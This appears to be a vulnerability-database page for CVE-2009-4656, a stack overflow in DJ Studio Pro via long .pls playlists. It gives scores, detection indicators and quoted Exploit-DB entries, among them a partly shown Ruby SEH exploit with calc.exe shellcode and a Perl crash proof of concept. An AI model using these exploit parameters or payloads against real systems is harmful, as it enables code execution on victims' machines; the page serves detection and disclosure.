CVE-2009-4656
published 2010-03-03CVE-2009-4656: Stack-based buffer overflow in E-Soft DJ Studio Pro 4.2 including 4.2.2.7.5, and 5.x including 5.1.4.3.1, allows user-assisted remote attackers to cause a…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.72%
98.1th percentile
Stack-based buffer overflow in E-Soft DJ Studio Pro 4.2 including 4.2.2.7.5, and 5.x including 5.1.4.3.1, allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a playlist file (.pls) containing a long string. NOTE: some of these details are obtained from third party information.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| e-soft.co | dj_studio_pro | — | — |
| e-soft.co | dj_studio_pro | — | — |
| e-soft.co | dj_studio_pro | — | — |
| e-soft.co | dj_studio_pro | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90\x2d\xc6\x4f\x01
bytes↗
\xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49
- →Malicious .pls file triggers SEH-based stack buffer overflow; look for .pls files with a padding block of 1308 bytes followed by a short JMP (\xeb\x06\x90\x90) and SEH overwrite at offset 1308+4. ↗
- →SEH overwrite targets pop-pop-ret gadget at fixed address 0x014FC62D inside djstudiopro.exe; presence of this address in a .pls file is a strong exploit indicator. ↗
- →Payload bad characters are \x00, \x0a, and \x3d (null, newline, equals sign); encoded shellcode in a .pls file will avoid these bytes. ↗
- →Simpler crash PoC writes 350,000 'A' characters into a .pls file; any .pls file exceeding normal playlist size bounds warrants inspection. ↗
- ·The fixed ROP/SEH gadget address (0x014FC62D) is specific to DJStudioPro.exe version 5.1.6.5.2 on Windows XP SP2 EN; the exploit will not work reliably against other versions or OS configurations without a new gadget address. ↗
- ·Remote exploitation via browser requires the .pls file extension to be registered to DJ Studio Pro; this vector was not tested in the Metasploit module. ↗
- ·The Metasploit module uses a stack adjustment of -3500 bytes to accommodate the payload space of 5000 bytes; payloads exceeding this space or requiring different adjustments will need reconfiguration. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
exploitdb·2012-03-02
CVE-2009-4656 DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DJ Studio Pro 5.1 .pls Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.
When handling a .pls file, DJ Studio will copy the user-supplied data on the stack
without any proper bounds checking done beforehand, therefore allowing code
execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sebastien Duquette',
'Death-Shadow-Dark
Exploit-DB
DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)
exploitdb·2012-02-20
CVE-2009-4656 DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)
DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DJ Studio Pro 5.1.6.5.2 SEH Exploit',
'Description' => %q{
This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to DJ Studio Pro.
This functionality has not been tested in this module.
Exploit-DB
DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)
exploitdb·2009-12-30
CVE-2009-4656 DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)
DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date : 2009-12-30
# Author : Sébastien Duquette - [email protected]
# Software Link : http://www.e-soft.co.uk/
# Version : 5.1.6.5.2
# Tested on : Windows XP SP2 En
# OSVDB ID : 58159
# Overflow originally discovered by prodigy
# exec calc.exe
payload =
"\xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x49\x6c\x48\x68\x4b\x39\x45\x50\x43\x30\x45" +
"\x50\x43\x50\x4d\x59\x48\x65\x46\x51\x4a\x72\x43\x54\x4e" +
"\x6b\x51\x42\x46\x50\x4c\x4b\x50\x52\x44\x4c\x4c\x4b\
Exploit-DB
DJ Studio Pro 4.2 - '.pls' Local Crash
exploitdb·2009-09-15
CVE-2009-4656 DJ Studio Pro 4.2 - '.pls' Local Crash
DJ Studio Pro 4.2 - '.pls' Local Crash
---
#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.pls";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfully\n";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-09-15]
Metasploit
DJ Studio Pro 5.1 .pls Stack Buffer Overflow
metasploit
DJ Studio Pro 5.1 .pls Stack Buffer Overflow
DJ Studio Pro 5.1 .pls Stack Buffer Overflow
This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2. When handling a .pls file, DJ Studio will copy the user-supplied data on the stack without any proper bounds checking done beforehand, therefore allowing code execution under the context of the user.
No writeups or analysis indexed.
http://secunia.com/advisories/36728http://www.exploit-db.com/exploits/9691http://www.vupen.com/english/advisories/2009/2681https://exchange.xforce.ibmcloud.com/vulnerabilities/53310http://secunia.com/advisories/36728http://www.exploit-db.com/exploits/9691http://www.vupen.com/english/advisories/2009/2681https://exchange.xforce.ibmcloud.com/vulnerabilities/53310
2010-03-03
Published